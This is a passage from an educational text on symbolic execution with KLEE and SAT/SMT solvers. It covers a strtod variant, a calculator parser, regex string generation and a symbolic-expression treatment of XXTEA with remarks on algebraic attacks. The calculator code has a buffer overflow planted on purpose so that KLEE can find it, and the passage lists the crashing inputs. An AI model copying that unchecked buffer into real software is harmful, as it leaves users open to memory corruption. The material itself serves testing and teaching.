60 /* Number of digits in mantissa. */
61 int mantSize;
62
63 /* Number of mantissa digits BEFORE decimal point. */
64 int decPt;
65
66 /* Temporarily holds location of exponent in string. */
67 char *pExp;
68
69 /* Largest possible base 10 exponent.
70 * Any exponent larger than this will already
71 * produce underflow or overflow, so there's
72 * no need to worry about additional digits. */
73 static int maxExponent = 307;
74
75 /* Table giving binary powers of 10.
76 * Entry is 10^2^i. Used to convert decimal
77 * exponents into floating-point numbers. */
78 static double powersOf10[] = {
79 1e1, 1e2, 1e4, 1e8, 1e16, 1e32, //1e64, 1e128, 1e256,
80 };
81 static double powersOf2[] = {
82 2, 4, 16, 256, 65536, 4.294967296e9, 1.8446744073709551616e19,
83 //3.4028236692093846346e38, 1.1579208923731619542e77, 1.3407807929942597099e154,
84 };
85 static double powersOf8[] = {
86 8, 64, 4096, 2.81474976710656e14, 7.9228162514264337593e28,
87 //6.2771017353866807638e57, 3.9402006196394479212e115, 1.5525180923007089351e231,
88 };
89 static double powersOf16[] = {
90 16, 256, 65536, 1.8446744073709551616e19,
91 //3.4028236692093846346e38, 1.1579208923731619542e77, 1.3407807929942597099e154,
92 };
93
94 /*
95 * Strip off leading blanks and check for a sign.
96 */
97 p = string;
98 while (*p==' ' || *p=='\t')
99 ++p;
100 if (*p == '-') {
101 sign = 1;
102 ++p;
103 } else if (*p == '+')
104 ++p;
105
106 /*
107 * Count the number of digits in the mantissa (including the decimal
103
108 * point), and also locate the decimal point.
109 */
110 decPt = -1;
111 for (mantSize=0; ; ++mantSize) {
112 c = *p;
113 if (!isdigitx (c, radix)) {
114 if (c != '.' || decPt >= 0)
115 break;
116 decPt = mantSize;
117 }
118 ++p;
119 }
120
121 /*
122 * Now suck up the digits in the mantissa. Use two integers to
123 * collect 9 digits each (this is faster than using floating-point).
124 * If the mantissa has more than 18 digits, ignore the extras, since
125 * they can't affect the value anyway.
126 */
127 pExp = p;
128 p -= mantSize;
129 if (decPt < 0)
130 decPt = mantSize;
131 else
132 --mantSize; /* One of the digits was the point. */
133
134 switch (radix) {
135 default:
136 case 10: fracSz = 9; fracOff = 1000000000; powTab = powersOf10; break;
137 case 2: fracSz = 30; fracOff = 1073741824; powTab = powersOf2; break;
138 case 8: fracSz = 10; fracOff = 1073741824; powTab = powersOf8; break;
139 case 16: fracSz = 7; fracOff = 268435456; powTab = powersOf16; break;
140 }
141 if (mantSize > 2 * fracSz)
142 mantSize = 2 * fracSz;
143 fracExp = decPt - mantSize;
144 if (mantSize == 0) {
145 fraction = 0.0;
146 p = string;
147 goto done;
148 } else {
149 int frac1, frac2;
150
151 for (frac1=0; mantSize>fracSz; --mantSize) {
152 c = *p++;
153 if (c == '.')
154 c = *p++;
155 frac1 = frac1 * radix + (c - '0');
156 }
157 for (frac2=0; mantSize>0; --mantSize) {
158 c = *p++;
159 if (c == '.')
160 c = *p++;
161 frac2 = frac2 * radix + (c - '0');
162 }
163 fraction = (double) fracOff * frac1 + frac2;
164 }
165
166 /*
167 * Skim off the exponent.
168 */
169 p = pExp;
170 if (*p=='E' || *p=='e' || *p=='S' || *p=='s' || *p=='F' || *p=='f' ||
171 *p=='D' || *p=='d' || *p=='L' || *p=='l') {
172 ++p;
173 if (*p == '-') {
174 expSign = 1;
175 ++p;
176 } else if (*p == '+')
177 ++p;
178 while (isdigitx (*p, radix))
179 exp = exp * radix + (*p++ - '0');
180 }
181 if (expSign)
182 exp = fracExp - exp;
183 else
104
184 exp = fracExp + exp;
185
186 /*
187 * Generate a floating-point number that represents the exponent.
188 * Do this by processing the exponent one bit at a time to combine
189 * many powers of 2 of 10. Then combine the exponent with the
190 * fraction.
191 */
192 if (exp < 0) {
193 expSign = 1;
194 exp = -exp;
195 } else
196 expSign = 0;
197 if (exp > maxExponent)
198 exp = maxExponent;
199 dblExp = 1.0;
200 for (i=0; exp; exp>>=1, ++i)
201 if (exp & 01)
202 dblExp *= powTab[i];
203 if (expSign)
204 fraction /= dblExp;
205 else
206 fraction *= dblExp;
207
208 done:
209 if (endPtr)
210 *endPtr = p;
211
212 return sign ? -fraction : fraction;
213 }
214
215 #define BUFSIZE 10
216 int main()
217 {
218 char buf[BUFSIZE];
219 klee_make_symbolic (buf, sizeof buf, "buf");
220 klee_assume(buf[9]==0);
221
222 strtodx (buf, NULL, 10);
223 };
(https://github.com/dennis714/SAT_SMT_article/blob/master/KLEE/strtodx.c )
Interestinly,KLEEcannothandlefloating-pointarithmetic,butnevertheless,foundsomething:
...
KLEE: ERROR: /home/klee/klee_test.c:202: memory error: out of bound pointer
...
% ktest-tool klee-last/test003483.ktest
ktest file : 'klee-last/test003483.ktest'
args : ['klee_test.bc']
num objects: 1
object 0: name: b'buf'
object 0: size: 10
object 0: data: b'-.0E-66\x00\x00\x00'
Asitseems,string“-.0E-66”makesoutofboundsarrayaccess(read)atline202.Whilefurtherinvestiga-
tion,I’vefoundthat powersOf10[] arrayistooshort: 6thelement(startedat0th)hasbeenaccessed. And
hereweseepartofarraycommented(line79)! Probablysomeone’smistake?
9.12 Unit testing: simple expression evaluator (calculator)
Ihasbeenlookingforsimpleexpressionevaluator(calculatorinotherwords)whichtakesexpressionlike
“2+2”oninputandgivesanswer.I’vefoundoneat http://stackoverflow.com/a/13895198 .Unfortunately,
ithasnobugs,soI’veintroducedone:atokenbuffer( buf[]atline31)issmallerthaninputbuffer( input[]
atline19).
1// copypasted from http://stackoverflow.com/a/13895198 and reworked
2
3// Bare bones scanner and parser for the following LL(1) grammar:
105
4// expr -> term { [+-] term } ; An expression is terms separated by add ops.
5// term -> factor { [*/] factor } ; A term is factors separated by mul ops.
6// factor -> unsigned_factor ; A signed factor is a factor,
7// | - unsigned_factor ; possibly with leading minus sign
8// unsigned_factor -> ( expr ) ; An unsigned factor is a parenthesized expression
9// | NUMBER ; or a number
10 //
11 // The parser returns the floating point value of the expression.
12
13 #include <string.h>
14 #include <stdio.h>
15 #include <stdlib.h>
16 #include <stdint.h>
17 #include <stdbool.h>
18
19 char input[128];
20 int input_idx=0;
21
22 char my_getchar()
23 {
24 char rt=input[input_idx];
25 input_idx++;
26 return rt;
27 };
28
29 // The token buffer. We never check for overflow! Do so in production code.
30 // it's deliberately smaller than input[] so KLEE could find buffer overflow
31 char buf[64];
32 int n = 0;
33
34 // The current character.
35 int ch;
36
37 // The look-ahead token. This is the 1 in LL(1).
38 enum { ADD_OP, MUL_OP, LEFT_PAREN, RIGHT_PAREN, NOT_OP, NUMBER, END_INPUT } look_ahead;
39
40 // Forward declarations.
41 void init(void);
42 void advance(void);
43 int expr(void);
44 void error(char *msg);
45
46 // Parse expressions, one per line.
47 int main(void)
48 {
49 // take input expression from input[]
50 //input[0]=0;
51 //strcpy (input, "2+2");
52 klee_make_symbolic(input, sizeof input, "input");
53 input[127]=0;
54
55 init();
56 while (1)
57 {
58 int val = expr();
59 printf("%d\n", val);
60
61 if (look_ahead != END_INPUT)
62 error("junk after expression");
63 advance(); // past end of input mark
64 }
65 return 0;
66 }
67
68 // Just die on any error.
69 void error(char *msg)
70 {
71 fprintf(stderr, "Error: %s. Exiting.\n", msg);
72 exit(1);
73 }
74
75 // Buffer the current character and read a new one.
76 void read()
77 {
78 buf[n++] = ch;
79 buf[n] = '\0'; // Terminate the string.
106
80 ch = my_getchar();
81 }
82
83 // Ignore the current character.
84 void ignore()
85 {
86 ch = my_getchar();
87 }
88
89 // Reset the token buffer.
90 void reset()
91 {
92 n = 0;
93 buf[0] = '\0';
94 }
95
96 // The scanner. A tiny deterministic finite automaton.
97 int scan()
98 {
99 reset();
100 START:
101 // first character is digit?
102 if (isdigit (ch))
103 goto DIGITS;
104
105 switch (ch)
106 {
107 case ' ': case '\t': case '\r':
108 ignore();
109 goto START;
110
111 case '-': case '+': case '^':
112 read();
113 return ADD_OP;
114
115 case ' ':
116 read();
117 return NOT_OP;
118
119 case '*': case '/': case '%':
120 read();
121 return MUL_OP;
122
123 case '(':
124 read();
125 return LEFT_PAREN;
126
127 case ')':
128 read();
129 return RIGHT_PAREN;
130
131 case 0:
132 case '\n':
133 ch = ' '; // delayed ignore()
134 return END_INPUT;
135
136 default:
137 printf ("bad character: 0x%x\n", ch);
138 exit(0);
139 }
140
141 DIGITS:
142 if (isdigit (ch))
143 {
144 read();
145 goto DIGITS;
146 }
147 else
148 return NUMBER;
149 }
150
151 // To advance is just to replace the look-ahead.
152 void advance()
153 {
154 look_ahead = scan();
155 }
107
156
157 // Clear the token buffer and read the first look-ahead.
158 void init()
159 {
160 reset();
161 ignore(); // junk current character
162 advance();
163 }
164
165 int get_number(char *buf)
166 {
167 char *endptr;
168
169 int rt=strtoul (buf, &endptr, 10);
170
171 // is the whole buffer has been processed?
172 if (strlen(buf)!=endptr-buf)
173 {
174 fprintf (stderr, "invalid number: %s\n", buf);
175 exit(0);
176 };
177 return rt;
178 };
179
180 int unsigned_factor()
181 {
182 int rtn = 0;
183 switch (look_ahead)
184 {
185 case NUMBER:
186 rtn=get_number(buf);
187 advance();
188 break;
189
190 case LEFT_PAREN:
191 advance();
192 rtn = expr();
193 if (look_ahead != RIGHT_PAREN) error("missing ')'");
194 advance();
195 break;
196
197 default:
198 printf("unexpected token: %d\n", look_ahead);
199 exit(0);
200 }
201 return rtn;
202 }
203
204 int factor()
205 {
206 int rtn = 0;
207 // If there is a leading minus...
208 if (look_ahead == ADD_OP && buf[0] == '-')
209 {
210 advance();
211 rtn = -unsigned_factor();
212 }
213 else
214 rtn = unsigned_factor();
215
216 return rtn;
217 }
218
219 int term()
220 {
221 int rtn = factor();
222 while (look_ahead == MUL_OP)
223 {
224 switch(buf[0])
225 {
226 case '*':
227 advance();
228 rtn *= factor();
229 break;
230
231 case '/':
108
232 advance();
233 rtn /= factor();
234 break;
235 case '%':
236 advance();
237 rtn %= factor();
238 break;
239 }
240 }
241 return rtn;
242 }
243
244 int expr()
245 {
246 int rtn = term();
247 while (look_ahead == ADD_OP)
248 {
249 switch(buf[0])
250 {
251 case '+':
252 advance();
253 rtn += term();
254 break;
255
256 case '-':
257 advance();
258 rtn -= term();
259 break;
260 }
261 }
262 return rtn;
263 }
(https://github.com/dennis714/SAT_SMT_article/blob/master/KLEE/calc.c )
KLEEfoundbufferoverflowwithlittleeffort(65zerodigits+onetabulationsymbol):
% ktest-tool --write-ints klee-last/test000468.ktest
ktest file : 'klee-last/test000468.ktest'
args : ['calc.bc']
num objects: 1
object 0: name: b'input'
object 0: size: 128
object 0: data: b'0\t0000000000000000000000000000000000000000000000000000000000000000\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff'
Hardtosay,howtabulationsymbol( \t)gotintoinput[]array,butKLEEachievedwhathasbeendesired:
bufferoverflown.
KLEEalsofoundtwoexpressionstringswhichleadstodivisionerror(“0/0”and“0%0”):
% ktest-tool --write-ints klee-last/test000326.ktest
ktest file : 'klee-last/test000326.ktest'
args : ['calc.bc']
num objects: 1
object 0: name: b'input'
object 0: size: 128
object 0: data: b'0/0\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff'
% ktest-tool --write-ints klee-last/test000557.ktest
ktest file : 'klee-last/test000557.ktest'
args : ['calc.bc']
num objects: 1
object 0: name: b'input'
object 0: size: 128
object 0: data: b'0%0\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff'
109
Maybethisisnotimpressiveresult,nevertheless,it’syetanotherreminderthatdivisionandremainder
operationsmustbewrappedsomehowinproductioncodetoavoidpossiblecrash.
9.13 Regular expressions
I’vealwayswantedtogeneratepossiblestringsforgivenregularexpression. Thisisnotsohardiftodive
intoregularexpressionmatchertheoryanddetails,butcanweforceREmatchertodothis?
ItooklightestREengineI’vefound: https://github.com/cesanta/slre ,andwrotethis:
int main(void)
{
char s[6];
klee_make_symbolic(s, sizeof s, "s");
s[5]=0;
if (slre_match("^\\d[a-c]+(x|y|z)", s, 5, NULL, 0, 0)==5)
klee_assert(0);
}
SoIwantedastringconsistingofdigit,“a”or“b”or“c”(atleastonecharacter)and“x”or“y”or“z”(one
character). Thewholestringmusthavesizeof5characters.
% klee --libc=uclibc slre.bc
...
KLEE: ERROR: /home/klee/slre.c:445: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
...
% ls klee-last | grep err
test000014.external.err
% ktest-tool --write-ints klee-last/test000014.ktest
ktest file : 'klee-last/test000014.ktest'
args : ['slre.bc']
num objects: 1
object 0: name: b's'
object 0: size: 6
object 0: data: b'5aaax\xff'
Thisisindeedcorrectstring. “\xff”isattheplacewhereterminalzerobyteshouldbe,butREenginewe
useignoresthelastzerobyte, becauseithasbufferlenghtasapassedparameter. Hence, KLEEdoesn’t
reconstructfinalbyte.
Canwegetmore? Nowweaddadditionalconstraint:
int main(void)
{
char s[6];
klee_make_symbolic(s, sizeof s, "s");
s[5]=0;
if (slre_match("^\\d[a-c]+(x|y|z)", s, 5, NULL, 0, 0)==5 &&
strcmp(s, "5aaax")!=0)
klee_assert(0);
}
% ktest-tool --write-ints klee-last/test000014.ktest
ktest file : 'klee-last/test000014.ktest'
args : ['slre.bc']
num objects: 1
object 0: name: b's'
object 0: size: 6
object 0: data: b'7aaax\xff'
Let’ssay,outofwhim,wedon’tlike“a”atthe2ndposition(startingat0th):
int main(void)
{
char s[6];
klee_make_symbolic(s, sizeof s, "s");
s[5]=0;
if (slre_match("^\\d[a-c]+(x|y|z)", s, 5, NULL, 0, 0)==5 &&
strcmp(s, "5aaax")!=0 &&
s[2]!='a')
klee_assert(0);
}
110
KLEEfoundawaytosatisfyournewconstraint:
% ktest-tool --write-ints klee-last/test000014.ktest
ktest file : 'klee-last/test000014.ktest'
args : ['slre.bc']
num objects: 1
object 0: name: b's'
object 0: size: 6
object 0: data: b'7abax\xff'
Let’salsodefineconstraintKLEEcannotsatisfy:
int main(void)
{
char s[6];
klee_make_symbolic(s, sizeof s, "s");
s[5]=0;
if (slre_match("^\\d[a-c]+(x|y|z)", s, 5, NULL, 0, 0)==5 &&
strcmp(s, "5aaax")!=0 &&
s[2]!='a' &&
s[2]!='b' &&
s[2]!='c')
klee_assert(0);
}
Itcannotindeed,andKLEEfinishedwithoutreportingabout klee_assert() triggering.
9.14 Exercise
Hereismycrackme/keygenme,whichmaybetricky,buteasytosolveusingKLEE: http://challenges.re/
74/.
10 (Amateur) cryptography
10.1 Serious cryptography
Let’sbacktothemethodwepreviouslyused( 8.2)toconstructexpressionsusingrunningPythonfunction.
WecantrytobuildexpressionfortheoutputofXXTEAencryptionalgorithm:
#!/usr/bin/env python
class Expr:
def __init__(self,s):
self.s=s
def __str__(self):
return self.s
def convert_to_Expr_if_int(self, n):
if isinstance(n, int):
return Expr(str(n))
if isinstance(n, Expr):
return n
raise AssertionError # unsupported type
def __xor__(self, other):
return Expr("(" + self.s + "^" + self.convert_to_Expr_if_int(other).s + ")")
def __mul__(self, other):
return Expr("(" + self.s + "*" + self.convert_to_Expr_if_int(other).s + ")")
def __add__(self, other):
return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")")
def __and__(self, other):
return Expr("(" + self.s + "&" + self.convert_to_Expr_if_int(other).s + ")")
def __lshift__(self, other):
return Expr("(" + self.s + "<<" + self.convert_to_Expr_if_int(other).s + ")")
def __rshift__(self, other):
111
return Expr("(" + self.s + ">>" + self.convert_to_Expr_if_int(other).s + ")")
def __getitem__(self, d):
return Expr("(" + self.s + "[" + d.s + "])")
# reworked from:
# Pure Python (2.x) implementation of the XXTEA cipher
# (c) 2009. Ivan Voras <ivoras@gmail.com>
# Released under the BSD License.
def raw_xxtea(v, n, k):
def MX():
return ((z>>5)^(y<<2)) + ((y>>3)^(z<<4))^(sum^y) + (k[(Expr(str(p)) & 3)^e]^z)
y = v[0]
sum = Expr("0")
DELTA = 0x9e3779b9
# Encoding only
z = v[n-1]
# number of rounds:
#q = 6 + 52 / n
q=1
while q > 0:
q -= 1
sum = sum + DELTA
e = (sum >> 2) & 3
p = 0
while p < n - 1:
y = v[p+1]
z = v[p] = v[p] + MX()
p += 1
y = v[0]
z = v[n-1] = v[n-1] + MX()
return 0
v=[Expr("input1"), Expr("input2"), Expr("input3"), Expr("input4")]
k=Expr("key")
raw_xxtea(v, 4, k)
for i in range(4):
print i, ":", v[i]
#print len(str(v[0]))+len(str(v[1]))+len(str(v[2]))+len(str(v[3]))
Akeyischoosenaccordingtoinputdata,and,obviously,wecan’tknowitduringsymbolicexecution,so
weleaveexpressionlike k[...].
Nowresultsforjustoneround,foreachof4outputs:
0 : (input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+
((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))
1 : (input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^
input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+
((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&
3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+
((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))
2 : (input3+(((((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^
(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+
((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^
input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+
((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))
^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))>>5)^(input4<<2))+
((input4>>3)^((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^
input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+
((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^
(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))))))<<4)))^(((0+2654435769)^input4)+((key[((2&3)^(((0+2654435769)>>2)&
3))])^(input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^
112
input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+
((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&
3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))))))))))
3 : (input4+(((((input3+(((((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^
(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^
((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^
(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))))))>>5)^(input4<<2))+((input4>>3)^((input2+(((((input1+((((input4>>5)^
(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^
input4))))>>5)^(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^
(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+
((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^
(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))<<4)))^(((0+2654435769)^
input4)+((key[((2&3)^(((0+2654435769)>>2)&3))])^(input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^
(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+
((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+
((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)
>>
2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))))))))))>>5)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<
4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<2))+(((input1+((((input4>>5)^
(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^
input4))))>>3)^((input3+(((((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+
2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+
((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>
2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>
5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^
input4))))))))>>5)^(input4<<2))+((input4>>3)^((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^
(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+
((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+
((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)
>>
2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))))))<<4)))^(((0+2654435769)^input4)+((key[((2&3)^(((0+2654435769)>>2)&3))])
^
(input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)
^
(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+
((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((
0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(
input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))))))<<4)))^(((0+
2654435769)^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)
^
(((0+2654435769)>>2)&3))])^input4)))))+((key[((3&3)^(((0+2654435769)>>2)&3))])^(input3+(((((input2+(((((input1+
((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>
2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<
4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+
((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+
2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))>>5)^(input4<<2))+((input4>>3)^((
input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((
input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+
2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^
(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))<<4)))^(((0+
2654435769)^input4)+((key[((2&3)^(((0+2654435769)>>2)&3))])^(input2+(((((input1+((((input4>>5)^(input2<<2))+
((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^
(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^
input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+
2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+
((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))))))))))
Somehow,sizeofexpressionforeachsubsequentoutputisbigger. IhopeIhaven’tbeenmistaken? And
thisisjustfor1round. For2rounds,sizeofall4expressionis 970KB. For3rounds,thisis 115MB. For
4rounds,IhavenotenoughRAMonmycomputer. Expressions explodingexponentially. Andthereare19
rounds. Youcanweighit.
Perhaps, you can simplify these expressions: there are a lot of excessive parenthesis, but I’m highly
pessimistic,cryptoalgorithmsconstructedinsuchawaytonothaveanyspareoperations.
Inordertocrackit,youcanusetheseexpressionsassystemofequationandtrytosolveitusingSMT-
solver. Thisiscalled“algebraicattack”.
113
Inotherwords,theoretically,youcanbuildsystemofequationlikethis: MD5(x) = 12341234 :::,butexpres-
sionsaresohugesoit’simpossibletosolvethem. Yes, cryptographersarefullyawareofthisandoneof
thegoalsofthesuccessfulcipheristomakeexpressionsasbigaspossible,usingresonabletimeandsizeof
algorithm.
Nevertheless,youcanfindnumerouspapersaboutbreakingthesecryptosystemswithreducednumber
ofrounds: whenexpressionisn’t explodedyet,sometimesit’spossible. Thiscannotbeappliedinpractice,
butsuchexperiencehassomeinterestingtheoreticalresults.
10.1.1 Attempts to break “serious” crypto
CryptoMiniSatitselfexisttosupportXORoperation,whichisubiquitousincryptography.
•Bitcoin mining with SAT solver: http://jheusser.github.io/2013/02/03/satcoin.html ,https://
github.com/msoos/sha256-sat-bitcoin .
•AlexanderSemenov,attemptstobreakA5/1,etc. (Russianpresentation)
•VegardNossum-SAT-basedpreimageattacksonSHA-1
•AlgebraicAttacksontheCrypto-1StreamCipherinMiFareClassicandOysterCards
•AttackingBiviumUsingSATSolvers
